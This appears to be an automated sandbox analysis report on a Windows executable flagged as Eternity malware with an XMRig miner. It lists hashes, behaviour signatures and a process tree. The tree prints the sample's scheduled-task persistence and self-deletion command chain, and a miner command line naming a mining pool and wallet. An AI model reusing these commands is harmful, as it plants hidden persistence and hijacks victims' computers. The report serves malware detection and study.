Overview
overview
10Static
static
10202ad65f39...2f.exe
windows7-x64
10202ad65f39...2f.exe
windows10-2004-x64
102722079047...42.exe
windows7-x64
72722079047...42.exe
windows10-2004-x64
761b08c9b1c...29.exe
windows7-x64
1061b08c9b1c...29.exe
windows10-2004-x64
10a89d4dfabf...a9.exe
windows7-x64
10a89d4dfabf...a9.exe
windows10-2004-x64
10bb1e9db6d9...76.exe
windows7-x64
7bb1e9db6d9...76.exe
windows10-2004-x64
7e9fca3db7f...67.exe
windows7-x64
10e9fca3db7f...67.exe
windows10-2004-x64
10Analysis
-
max time kernel
149s -
max time network
153s -
platform
windows10-2004_x64 -
resource
win10v2004-20230220-en -
resource tags
arch:x64arch:x86image:win10v2004-20230220-enlocale:en-usos:windows10-2004-x64system -
submitted
13-05-2023 20:34
Behavioral task
behavioral1
Sample
202ad65f3956cde4764d1a789c3bac46a8b9dca3203c783a1efdc058bd94022f.exe
Resource
win7-20230220-en
Behavioral task
behavioral2
Sample
202ad65f3956cde4764d1a789c3bac46a8b9dca3203c783a1efdc058bd94022f.exe
Resource
win10v2004-20230220-en
Behavioral task
behavioral3
Sample
27220790475f6cf42fbaff5e5fbdfe452b7d79116547878b01ecdbc1c6a5b942.exe
Resource
win7-20230220-en
Behavioral task
behavioral4
Sample
27220790475f6cf42fbaff5e5fbdfe452b7d79116547878b01ecdbc1c6a5b942.exe
Resource
win10v2004-20230220-en
Behavioral task
behavioral5
Sample
61b08c9b1c1f836a8fe354ae53110ffc66ef1ecb9ea353b345d7690a0bb3be29.exe
Resource
win7-20230220-en
Behavioral task
behavioral6
Sample
61b08c9b1c1f836a8fe354ae53110ffc66ef1ecb9ea353b345d7690a0bb3be29.exe
Resource
win10v2004-20230220-en
Behavioral task
behavioral7
Sample
a89d4dfabf30a221b56db35ebe5b5852ad16fc8e8828d169219e97c849ec5fa9.exe
Resource
win7-20230220-en
Behavioral task
behavioral8
Sample
a89d4dfabf30a221b56db35ebe5b5852ad16fc8e8828d169219e97c849ec5fa9.exe
Resource
win10v2004-20230220-en
Behavioral task
behavioral9
Sample
bb1e9db6d9b4b5a858987999a1c8b68ea3610382968c36771da27a6625eba776.exe
Resource
win7-20230220-en
Behavioral task
behavioral10
Sample
bb1e9db6d9b4b5a858987999a1c8b68ea3610382968c36771da27a6625eba776.exe
Resource
win10v2004-20230221-en
Behavioral task
behavioral11
Sample
e9fca3db7f9c56f58cc1e28118c9897aa3cd0d2e052c62b3aed472bede51e467.exe
Resource
win7-20230220-en
Behavioral task
behavioral12
Sample
e9fca3db7f9c56f58cc1e28118c9897aa3cd0d2e052c62b3aed472bede51e467.exe
Resource
win10v2004-20230220-en
General
-
Target
a89d4dfabf30a221b56db35ebe5b5852ad16fc8e8828d169219e97c849ec5fa9.exe
-
Size
2.1MB
-
MD5
d5737f563015ca9df92bf17c6636db42
-
SHA1
957099807b7ab2e38d583f84fb7059711feec61f
-
SHA256
a89d4dfabf30a221b56db35ebe5b5852ad16fc8e8828d169219e97c849ec5fa9
-
SHA512
d160a076c6ab88634c8695ab3d9ca29e37e6a4fb43cd400d1d1047fb7da2614e3e5a537f4a10f55ee5ef3cc16d40552ea888437f72f937e824d96ef24536c518
-
SSDEEP
49152:kzuzgsK8XCwKyblc81KsH7FtfcaSPL/e6988MKMTq3xJTaUbEyi:NzgEywKybm81KQ7F9caSPi69893Oj81
Malware Config
Extracted
eternity
49vkUmVaigPGUsSL7xMRTxHbf38TkAMKFVN57A17sxUujLNgmrKi7bFcwb73uRWepASSZJPEWf1Kn81nWdHKDhEnAANFvmW
Signatures
-
Eternity
Eternity Project is a malware kit offering an info stealer, clipper, worm, coin miner, ransomware, and DDoS bot.
-
XMRig Miner payload 10 IoCs
resource yara_rule behavioral8/memory/3920-141-0x0000000140000000-0x0000000140758000-memory.dmp xmrig behavioral8/memory/3920-144-0x0000000140000000-0x0000000140758000-memory.dmp xmrig behavioral8/memory/3920-142-0x0000000140000000-0x0000000140758000-memory.dmp xmrig behavioral8/memory/3920-146-0x0000000140000000-0x0000000140758000-memory.dmp xmrig behavioral8/memory/3920-147-0x0000000140000000-0x0000000140758000-memory.dmp xmrig behavioral8/memory/3920-148-0x0000000140000000-0x0000000140758000-memory.dmp xmrig behavioral8/memory/3920-149-0x0000000140000000-0x0000000140758000-memory.dmp xmrig behavioral8/memory/3920-151-0x0000000140000000-0x0000000140758000-memory.dmp xmrig behavioral8/memory/3920-150-0x0000000140000000-0x0000000140758000-memory.dmp xmrig behavioral8/memory/3920-153-0x0000000140000000-0x0000000140758000-memory.dmp xmrig -
Checks computer location settings 2 TTPs 1 IoCs
Looks up country code configured in the registry, likely geofence.
description ioc Process Key value queried \REGISTRY\USER\S-1-5-21-1013461898-3711306144-4198452673-1000\Control Panel\International\Geo\Nation a89d4dfabf30a221b56db35ebe5b5852ad16fc8e8828d169219e97c849ec5fa9.exe -
Executes dropped EXE 2 IoCs
pid Process 1456 a89d4dfabf30a221b56db35ebe5b5852ad16fc8e8828d169219e97c849ec5fa9.exe 5052 a89d4dfabf30a221b56db35ebe5b5852ad16fc8e8828d169219e97c849ec5fa9.exe -
Legitimate hosting services abused for malware hosting/C2 1 TTPs
-
Suspicious use of SetThreadContext 1 IoCs
description pid Process procid_target PID 1456 set thread context of 3920 1456 a89d4dfabf30a221b56db35ebe5b5852ad16fc8e8828d169219e97c849ec5fa9.exe 92 -
Enumerates physical storage devices 1 TTPs
Attempts to interact with connected storage/optical drive(s).
-
Creates scheduled task(s) 1 TTPs 1 IoCs
Schtasks is often used by malware for persistence or to perform post-infection execution.
pid Process 816 schtasks.exe -
Runs ping.exe 1 TTPs 1 IoCs
pid Process 2296 PING.EXE -
Suspicious use of AdjustPrivilegeToken 2 IoCs
description pid Process Token: SeLockMemoryPrivilege 3920 explorer.exe Token: SeLockMemoryPrivilege 3920 explorer.exe -
Suspicious use of WriteProcessMemory 25 IoCs
description pid Process procid_target PID 4192 wrote to memory of 2100 4192 a89d4dfabf30a221b56db35ebe5b5852ad16fc8e8828d169219e97c849ec5fa9.exe 84 PID 4192 wrote to memory of 2100 4192 a89d4dfabf30a221b56db35ebe5b5852ad16fc8e8828d169219e97c849ec5fa9.exe 84 PID 2100 wrote to memory of 1048 2100 cmd.exe 86 PID 2100 wrote to memory of 1048 2100 cmd.exe 86 PID 2100 wrote to memory of 2296 2100 cmd.exe 87 PID 2100 wrote to memory of 2296 2100 cmd.exe 87 PID 2100 wrote to memory of 816 2100 cmd.exe 88 PID 2100 wrote to memory of 816 2100 cmd.exe 88 PID 2100 wrote to memory of 1456 2100 cmd.exe 89 PID 2100 wrote to memory of 1456 2100 cmd.exe 89 PID 1456 wrote to memory of 3920 1456 a89d4dfabf30a221b56db35ebe5b5852ad16fc8e8828d169219e97c849ec5fa9.exe 92 PID 1456 wrote to memory of 3920 1456 a89d4dfabf30a221b56db35ebe5b5852ad16fc8e8828d169219e97c849ec5fa9.exe 92 PID 1456 wrote to memory of 3920 1456 a89d4dfabf30a221b56db35ebe5b5852ad16fc8e8828d169219e97c849ec5fa9.exe 92 PID 1456 wrote to memory of 3920 1456 a89d4dfabf30a221b56db35ebe5b5852ad16fc8e8828d169219e97c849ec5fa9.exe 92 PID 1456 wrote to memory of 3920 1456 a89d4dfabf30a221b56db35ebe5b5852ad16fc8e8828d169219e97c849ec5fa9.exe 92 PID 1456 wrote to memory of 3920 1456 a89d4dfabf30a221b56db35ebe5b5852ad16fc8e8828d169219e97c849ec5fa9.exe 92 PID 1456 wrote to memory of 3920 1456 a89d4dfabf30a221b56db35ebe5b5852ad16fc8e8828d169219e97c849ec5fa9.exe 92 PID 1456 wrote to memory of 3920 1456 a89d4dfabf30a221b56db35ebe5b5852ad16fc8e8828d169219e97c849ec5fa9.exe 92 PID 1456 wrote to memory of 3920 1456 a89d4dfabf30a221b56db35ebe5b5852ad16fc8e8828d169219e97c849ec5fa9.exe 92 PID 1456 wrote to memory of 3920 1456 a89d4dfabf30a221b56db35ebe5b5852ad16fc8e8828d169219e97c849ec5fa9.exe 92 PID 1456 wrote to memory of 3920 1456 a89d4dfabf30a221b56db35ebe5b5852ad16fc8e8828d169219e97c849ec5fa9.exe 92 PID 1456 wrote to memory of 3920 1456 a89d4dfabf30a221b56db35ebe5b5852ad16fc8e8828d169219e97c849ec5fa9.exe 92 PID 1456 wrote to memory of 3920 1456 a89d4dfabf30a221b56db35ebe5b5852ad16fc8e8828d169219e97c849ec5fa9.exe 92 PID 1456 wrote to memory of 3920 1456 a89d4dfabf30a221b56db35ebe5b5852ad16fc8e8828d169219e97c849ec5fa9.exe 92 PID 1456 wrote to memory of 3920 1456 a89d4dfabf30a221b56db35ebe5b5852ad16fc8e8828d169219e97c849ec5fa9.exe 92 -
Uses Task Scheduler COM API 1 TTPs
The Task Scheduler COM API can be used to schedule applications to run on boot or at set times.
Processes
-
C:\Users\Admin\AppData\Local\Temp\a89d4dfabf30a221b56db35ebe5b5852ad16fc8e8828d169219e97c849ec5fa9.exe"C:\Users\Admin\AppData\Local\Temp\a89d4dfabf30a221b56db35ebe5b5852ad16fc8e8828d169219e97c849ec5fa9.exe"1⤵
- Checks computer location settings
- Suspicious use of WriteProcessMemory
PID:4192 -
C:\Windows\System32\cmd.exe"C:\Windows\System32\cmd.exe" /C chcp 65001 && ping 127.0.0.1 && schtasks /create /tn "a89d4dfabf30a221b56db35ebe5b5852ad16fc8e8828d169219e97c849ec5fa9" /sc MINUTE /tr "C:\Users\Admin\AppData\Local\ServiceHub\a89d4dfabf30a221b56db35ebe5b5852ad16fc8e8828d169219e97c849ec5fa9.exe" /rl HIGHEST /f && DEL /F /S /Q /A "C:\Users\Admin\AppData\Local\Temp\a89d4dfabf30a221b56db35ebe5b5852ad16fc8e8828d169219e97c849ec5fa9.exe" &&START "" "C:\Users\Admin\AppData\Local\ServiceHub\a89d4dfabf30a221b56db35ebe5b5852ad16fc8e8828d169219e97c849ec5fa9.exe"2⤵
- Suspicious use of WriteProcessMemory
PID:2100 -
C:\Windows\system32\chcp.comchcp 650013⤵PID:1048
-
-
C:\Windows\system32\PING.EXEping 127.0.0.13⤵
- Runs ping.exe
PID:2296
-
-
C:\Windows\system32\schtasks.exeschtasks /create /tn "a89d4dfabf30a221b56db35ebe5b5852ad16fc8e8828d169219e97c849ec5fa9" /sc MINUTE /tr "C:\Users\Admin\AppData\Local\ServiceHub\a89d4dfabf30a221b56db35ebe5b5852ad16fc8e8828d169219e97c849ec5fa9.exe" /rl HIGHEST /f3⤵
- Creates scheduled task(s)
PID:816
-
-
C:\Users\Admin\AppData\Local\ServiceHub\a89d4dfabf30a221b56db35ebe5b5852ad16fc8e8828d169219e97c849ec5fa9.exe"C:\Users\Admin\AppData\Local\ServiceHub\a89d4dfabf30a221b56db35ebe5b5852ad16fc8e8828d169219e97c849ec5fa9.exe"3⤵
- Executes dropped EXE
- Suspicious use of SetThreadContext
- Suspicious use of WriteProcessMemory
PID:1456 -
C:\Windows\explorer.exeC:\Windows\explorer.exe -a cryptonight -o pool.minexmr.com:4444 -u 49vkUmVaigPGUsSL7xMRTxHbf38TkAMKFVN57A17sxUujLNgmrKi7bFcwb73uRWepASSZJPEWf1Kn81nWdHKDhEnAANFvmW.Admin_HCIDPJOT -p x --max-cpu-usage=30 --donate-level=14⤵
- Suspicious use of AdjustPrivilegeToken
PID:3920
-
-
-
-
C:\Users\Admin\AppData\Local\ServiceHub\a89d4dfabf30a221b56db35ebe5b5852ad16fc8e8828d169219e97c849ec5fa9.exeC:\Users\Admin\AppData\Local\ServiceHub\a89d4dfabf30a221b56db35ebe5b5852ad16fc8e8828d169219e97c849ec5fa9.exe1⤵
- Executes dropped EXE
PID:5052
Network
MITRE ATT&CK Enterprise v6
Replay Monitor
Loading Replay Monitor...
Downloads
-
C:\Users\Admin\AppData\Local\Microsoft\CLR_v4.0\UsageLogs\a89d4dfabf30a221b56db35ebe5b5852ad16fc8e8828d169219e97c849ec5fa9.exe.log
Filesize425B
MD5fff5cbccb6b31b40f834b8f4778a779a
SHA1899ed0377e89f1ed434cfeecc5bc0163ebdf0454
SHA256b8f7e4ed81764db56b9c09050f68c5a26af78d8a5e2443e75e0e1aa7cd2ccd76
SHA5121a188a14c667bc31d2651b220aa762be9cce4a75713217846fbe472a307c7bbc6e3c27617f75f489902a534d9184648d204d03ee956ac57b11aa90551248b8f9
-
C:\Users\Admin\AppData\Local\ServiceHub\a89d4dfabf30a221b56db35ebe5b5852ad16fc8e8828d169219e97c849ec5fa9.exe
Filesize2.1MB
MD5d5737f563015ca9df92bf17c6636db42
SHA1957099807b7ab2e38d583f84fb7059711feec61f
SHA256a89d4dfabf30a221b56db35ebe5b5852ad16fc8e8828d169219e97c849ec5fa9
SHA512d160a076c6ab88634c8695ab3d9ca29e37e6a4fb43cd400d1d1047fb7da2614e3e5a537f4a10f55ee5ef3cc16d40552ea888437f72f937e824d96ef24536c518
-
C:\Users\Admin\AppData\Local\ServiceHub\a89d4dfabf30a221b56db35ebe5b5852ad16fc8e8828d169219e97c849ec5fa9.exe
Filesize2.1MB
MD5d5737f563015ca9df92bf17c6636db42
SHA1957099807b7ab2e38d583f84fb7059711feec61f
SHA256a89d4dfabf30a221b56db35ebe5b5852ad16fc8e8828d169219e97c849ec5fa9
SHA512d160a076c6ab88634c8695ab3d9ca29e37e6a4fb43cd400d1d1047fb7da2614e3e5a537f4a10f55ee5ef3cc16d40552ea888437f72f937e824d96ef24536c518
-
C:\Users\Admin\AppData\Local\ServiceHub\a89d4dfabf30a221b56db35ebe5b5852ad16fc8e8828d169219e97c849ec5fa9.exe
Filesize2.1MB
MD5d5737f563015ca9df92bf17c6636db42
SHA1957099807b7ab2e38d583f84fb7059711feec61f
SHA256a89d4dfabf30a221b56db35ebe5b5852ad16fc8e8828d169219e97c849ec5fa9
SHA512d160a076c6ab88634c8695ab3d9ca29e37e6a4fb43cd400d1d1047fb7da2614e3e5a537f4a10f55ee5ef3cc16d40552ea888437f72f937e824d96ef24536c518